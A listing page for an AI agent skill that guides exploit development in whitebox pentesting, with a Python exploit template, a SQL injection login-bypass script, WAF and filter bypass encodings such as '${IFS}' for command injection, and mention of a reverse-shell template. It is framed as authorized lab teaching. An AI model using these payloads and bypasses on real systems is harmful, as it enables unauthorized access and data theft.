What is Exploit Techniques used for?

A framework to translate confirmed vulnerabilities into PoC exploits and automated scripts during whitebox pentesting, primarily for demonstration and validation in safe environments.

Is it safe to use this skill outside lab environments?

No. It must only be used in authorized, isolated environments with explicit permission. Always follow legal and organizational guidelines.

Which languages are recommended?

Language choice depends on the target: Python for server-side/web targets, JavaScript for client-side/browser tests, pwntools for binary exploits, and PowerShell or Bash for environment-specific tooling.

Exploit Techniques

npx machina-cli add skill allsmog/vuln-scout/exploit-techniques --openclaw

Files (1)

SKILL.md

7.3 KB

Exploit Development Techniques

Purpose

Guide the development of Proof of Concept (PoC) exploits to demonstrate confirmed vulnerabilities. This is Phase 3 of the whitebox pentesting process.

When to Use

Activate this skill when:

A vulnerability has been confirmed through local testing
Writing automated exploit scripts
Documenting exploitation steps
Bypassing security controls

Language Selection

Choose exploit language based on target:

Scenario	Recommended Language
Web application (server-side)	Python
Client-side attack (browser)	JavaScript
Mixed (client + server chain)	Python + JavaScript
Binary exploitation	Python (pwntools)
Windows target	Python or PowerShell
Linux target	Python or Bash
Reusing application logic	Same as application

Python Exploit Structure

Basic Template

#!/usr/bin/env python3
"""
Exploit: [Application Name] [Vulnerability Type]
Author: [Your Name]
Date: [Date]
CVE: [If applicable]

Description:
[Brief description of the vulnerability]

Usage:
python3 exploit.py <target_url>
"""

import requests
import sys
import argparse

class Exploit:
    def __init__(self, target):
        self.target = target.rstrip('/')
        self.session = requests.Session()
    
    def check_vulnerable(self):
        """Verify target is vulnerable"""
        # Implementation
        pass
    
    def exploit(self):
        """Execute the exploit"""
        # Implementation
        pass
    
    def cleanup(self):
        """Remove any artifacts"""
        # Implementation
        pass

def main():
    parser = argparse.ArgumentParser(description='Exploit description')
    parser.add_argument('target', help='Target URL')
    parser.add_argument('--check', action='store_true', help='Check only')
    args = parser.parse_args()
    
    exploit = Exploit(args.target)
    
    if args.check:
        if exploit.check_vulnerable():
            print("[+] Target is vulnerable")
        else:
            print("[-] Target is not vulnerable")
        return
    
    try:
        exploit.exploit()
    finally:
        exploit.cleanup()

if __name__ == '__main__':
    main()

HTTP Requests Pattern

import requests

# Basic GET
response = requests.get(f"{target}/path", params={"key": "value"})

# POST with data
response = requests.post(f"{target}/path", data={"key": "value"})

# POST with JSON
response = requests.post(f"{target}/path", json={"key": "value"})

# With headers
headers = {"Authorization": "Bearer token", "X-Custom": "value"}
response = requests.get(f"{target}/path", headers=headers)

# With cookies
cookies = {"session": "abc123"}
response = requests.get(f"{target}/path", cookies=cookies)

# Session persistence
session = requests.Session()
session.post(f"{target}/login", data={"user": "admin", "pass": "pass"})
session.get(f"{target}/admin")  # Session cookies maintained

Exploit Development Workflow

Step 1: Document Manual Steps

Before automating, document each manual step:

1. Send request to /login with username=admin' OR 1=1--
2. Extract session token from response cookie
3. Access /admin/users with session token
4. Extract user data from response

Step 2: Implement Core Exploit

Translate manual steps to code:

def exploit(self):
    # Step 1: SQL Injection for auth bypass
    login_data = {"username": "admin' OR 1=1--", "password": "x"}
    resp = self.session.post(f"{self.target}/login", data=login_data)
    
    if "Welcome" not in resp.text:
        print("[-] Authentication bypass failed")
        return False
    
    # Step 2: Access admin panel
    resp = self.session.get(f"{self.target}/admin/users")
    
    # Step 3: Extract data
    users = self.parse_users(resp.text)
    return users

Step 3: Add Error Handling

def exploit(self):
    try:
        resp = self.session.post(f"{self.target}/login", data=payload, timeout=10)
        resp.raise_for_status()
    except requests.exceptions.Timeout:
        print("[-] Request timed out")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

Step 4: Add Verification

def check_vulnerable(self):
    """Non-destructive vulnerability check"""
    test_payload = "admin' AND '1'='1"
    resp = self.session.post(f"{self.target}/login", 
                              data={"username": test_payload, "password": "x"})
    
    # Check for SQL error or successful bypass
    indicators = ["SQL syntax", "mysql_fetch", "Welcome admin"]
    return any(ind in resp.text for ind in indicators)

Step 5: Add Cleanup

def cleanup(self):
    """Remove artifacts created during exploitation"""
    # Delete uploaded files
    # Restore modified data
    # Remove created accounts
    pass

Bypass Techniques

WAF Bypass in Payloads

# URL encoding
payload = urllib.parse.quote(payload)

# Double URL encoding
payload = urllib.parse.quote(urllib.parse.quote(payload))

# Unicode encoding
payload = payload.encode('unicode_escape').decode()

# Case variation
payload = ''.join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))

Filter Bypass

# Space alternatives
payload = payload.replace(' ', '/**/') # SQL
payload = payload.replace(' ', '${IFS}') # Command injection

# Quote alternatives
payload = payload.replace("'", "\\x27")
payload = payload.replace('"', '\\x22')

Output and Reporting

Success Indicators

def print_success(self, message):
    print(f"\033[92m[+]\033[0m {message}")

def print_error(self, message):
    print(f"\033[91m[-]\033[0m {message}")

def print_info(self, message):
    print(f"\033[94m[*]\033[0m {message}")

Structured Output

def generate_report(self):
    return {
        "target": self.target,
        "vulnerability": "SQL Injection",
        "endpoint": "/login",
        "parameter": "username",
        "payload": self.payload,
        "impact": "Authentication Bypass",
        "exploited": True,
        "data_extracted": self.extracted_data
    }

Security Considerations

Safe Testing

Always test on authorized targets only
Use non-destructive payloads when possible
Implement cleanup routines
Avoid DoS conditions
Log all actions for accountability

Responsible Disclosure

Document findings clearly
Provide remediation guidance
Allow reasonable fix timeline
Coordinate disclosure with vendor

Additional Resources

Example Files

Working exploit templates in examples/:

sqli-template.py - SQL injection exploit with union/blind detection
cmdi-template.py - Command injection with OS detection and reverse shell
deser-template.py - Deserialization exploits (Python, PHP, Java formats)

Integration with Other Skills

Use dangerous-functions to identify initial targets
Use data-flow-tracing to confirm vulnerability
Use vuln-patterns for technique selection

Source

git clone https://github.com/allsmog/vuln-scout/blob/main/whitebox-pentest/skills/exploit-techniques/SKILL.mdView on GitHub

Overview

Exploit Development Techniques guides the creation of Proof of Concept (PoC) exploits after vulnerability confirmation in a controlled whitebox pentest. It emphasizes documenting steps, building automated exploit scripts, and demonstrating exploitation while bypassing controls in isolated lab environments.

How This Skill Works

The skill provides a practical framework: select the appropriate language for the target, structure exploits with a reusable template, and follow a workflow from documenting manual steps to implementing a core exploit, then validating and cleaning up artifacts.

When to Use It

A vulnerability has been confirmed through local testing
Writing automated exploit scripts
Documenting exploitation steps for the report
Bypassing security controls in a controlled lab
Demonstrating a PoC to stakeholders

Quick Start

Step 1: Document manual steps that reproduce the vulnerability in a controlled test target
Step 2: Implement a core exploit skeleton in the chosen language and validate basic effects
Step 3: Test in an isolated environment, then cleanup artifacts and summarize findings

Best Practices

Operate only in an authorized, isolated lab with written permission
Document each manual step before attempting automation
Use safe, parameterized inputs and avoid handling sensitive data outside of the test scope
Keep exploit code modular, well-commented, and version-controlled; avoid leaking payloads
Capture results with clear remediation guidance and maintain thorough logs

Example Use Cases

PoC showing a authentication bypass in a test application within a lab environment
Automated exploit script for a known injection vulnerability in a controlled target
Demonstration of bypassing a simulated security control (e.g., WAF) in a lab setup
Browser-based client-side exploitation demonstration performed in a safe test harness
Binary exploitation workflow using a skeletal script in a lab target (e.g., pwntools-based outline)

Frequently Asked Questions

Add this skill to your agents